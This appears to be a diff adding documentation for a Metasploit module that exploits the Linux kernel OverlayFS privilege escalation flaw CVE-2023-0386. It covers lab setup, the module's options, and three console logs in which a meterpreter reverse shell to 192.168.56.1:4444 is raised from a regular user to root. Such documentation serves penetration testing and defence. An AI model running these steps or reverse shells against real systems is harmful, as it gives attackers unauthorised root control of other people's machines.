|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This exploit targets the Linux kernel bug in OverlayFS. |
| 4 | + |
| 5 | +A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities |
| 6 | +was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. |
| 7 | +This uid mapping bug allows a local user to escalate their privileges on the system. |
| 8 | + |
| 9 | +The vulnerability affects: |
| 10 | + |
| 11 | + * Linux kernel from (including) 5.11 up to (excluding) 5.15.91 and from (including) 5.16 Up to (excluding) 6.1.9 |
| 12 | + |
| 13 | +This module was successfully tested on: |
| 14 | + |
| 15 | + * Ubuntu kernel version 5.13.0-1021-oem on x64/amd64 |
| 16 | + |
| 17 | +### Install |
| 18 | + |
| 19 | +1. Install Ubuntu version 22.04 LTS |
| 20 | +2. (Optional) Change kernel version |
| 21 | +``` |
| 22 | +sudo apt update |
| 23 | +sudo apt install -y linux-image-5.13.0-1021-oem linux-headers-5.13.0-1021-oem |
| 24 | +reboot |
| 25 | +``` |
| 26 | +3. Install the required libraries |
| 27 | +``` |
| 28 | +sudo apt update |
| 29 | +sudo apt install -y gcc cmake fuse libfuse-dev libcap-dev |
| 30 | +``` |
| 31 | + |
| 32 | +## Verification Steps |
| 33 | + |
| 34 | +1. Make an Ubuntu |
| 35 | +2. Create a meterpreter or shell payload and upload it to the Ubuntu target |
| 36 | +3. Set up a handler for the payload |
| 37 | +4. Launch the payload as a regular user on the Ubuntu target and connect the handler |
| 38 | +5. Do: `use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc` |
| 39 | +6. Do: `run session=<session> lhost=<lhost>` |
| 40 | +7. You should get a root |
| 41 | + |
| 42 | +## Options |
| 43 | + |
| 44 | +### COMPILE (required) |
| 45 | + |
| 46 | +[Auto|True|False] This selects the binary to use. True will upload the source code and perform |
| 47 | +compilation on target, False will upload a precompiled binary. AUTO will favor compiling on target |
| 48 | +but will fall back to the precompiled option if a compiler cannot be found. |
| 49 | +The default value is `Auto` |
| 50 | + |
| 51 | +### WritableDir (required) |
| 52 | +This indicates the location where you would like the payload and exploit binary stored, as well |
| 53 | +as serving as a location to store the various files and directories created by the exploit itself. |
| 54 | +The default value is `/tmp` |
| 55 | + |
| 56 | +## Scenarios |
| 57 | +### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=Auto |
| 58 | +``` |
| 59 | +msf6 > use exploit/multi/handler |
| 60 | +[*] Using configured payload generic/shell_reverse_tcp |
| 61 | +msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp |
| 62 | +
|
| 63 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 64 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 65 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54776) at 2024-09-05 22:48:42 +0900 |
| 66 | +
|
| 67 | +meterpreter > getuid |
| 68 | +Server username: ubu |
| 69 | +meterpreter > background |
| 70 | +[*] Backgrounding session 1... |
| 71 | +msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc |
| 72 | +[*] Using configured payload linux/x64/meterpreter/reverse_tcp |
| 73 | +msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=Auto |
| 74 | +
|
| 75 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 76 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 77 | +[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 |
| 78 | +[*] Writing '/tmp/.a4HSc5ks' (334 bytes) ... |
| 79 | +[*] Launching exploit... |
| 80 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 81 | +[+] Deleted /tmp/.a4HSc5ks |
| 82 | +[+] Deleted /tmp/.Smx0d11hH |
| 83 | +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54778) at 2024-09-05 22:49:28 +0900 |
| 84 | +
|
| 85 | +meterpreter > getuid |
| 86 | +Server username: root |
| 87 | +``` |
| 88 | + |
| 89 | +### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=True |
| 90 | +``` |
| 91 | +msf6 > use exploit/multi/handler |
| 92 | +[*] Using configured payload generic/shell_reverse_tcp |
| 93 | +msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp |
| 94 | +
|
| 95 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 96 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 97 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54710) at 2024-09-05 22:45:40 +0900 |
| 98 | +
|
| 99 | +meterpreter > getuid |
| 100 | +Server username: ubu |
| 101 | +meterpreter > background |
| 102 | +[*] Backgrounding session 1... |
| 103 | +msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc |
| 104 | +[*] Using configured payload linux/x64/meterpreter/reverse_tcp |
| 105 | +msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=True |
| 106 | +
|
| 107 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 108 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 109 | +[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 |
| 110 | +[*] Writing '/tmp/.uKkt1jtoJ' (334 bytes) ... |
| 111 | +[*] Launching exploit... |
| 112 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 113 | +[+] Deleted /tmp/.uKkt1jtoJ |
| 114 | +[+] Deleted /tmp/.oaqii9pj |
| 115 | +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54712) at 2024-09-05 22:46:19 +0900 |
| 116 | +
|
| 117 | +meterpreter > getuid |
| 118 | +Server username: root |
| 119 | +``` |
| 120 | + |
| 121 | +### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=False |
| 122 | +``` |
| 123 | +msf6 > use exploit/multi/handler |
| 124 | +[*] Using configured payload generic/shell_reverse_tcp |
| 125 | +msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp |
| 126 | +
|
| 127 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 128 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 129 | +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54616) at 2024-09-05 22:36:45 +0900 |
| 130 | +
|
| 131 | +meterpreter > getuid |
| 132 | +Server username: ubu |
| 133 | +meterpreter > background |
| 134 | +[*] Backgrounding session 1... |
| 135 | +msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc |
| 136 | +[*] Using configured payload linux/x64/meterpreter/reverse_tcp |
| 137 | +msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=False |
| 138 | +
|
| 139 | +[*] Started reverse TCP handler on 192.168.56.1:4444 |
| 140 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 141 | +[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 |
| 142 | +[*] Writing '/tmp/.9tZar0/cve-2023-0386' (2215928 bytes) ... |
| 143 | +[*] Writing '/tmp/.Z37h3bkJpw' (334 bytes) ... |
| 144 | +[*] Launching exploit... |
| 145 | +[*] Sending stage (3045380 bytes) to 192.168.56.102 |
| 146 | +[+] Deleted /tmp/.Z37h3bkJpw |
| 147 | +[+] Deleted /tmp/.9tZar0 |
| 148 | +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54618) at 2024-09-05 22:37:31 +0900 |
| 149 | +
|
| 150 | +meterpreter > getuid |
| 151 | +Server username: root |
| 152 | +``` |
0 commit comments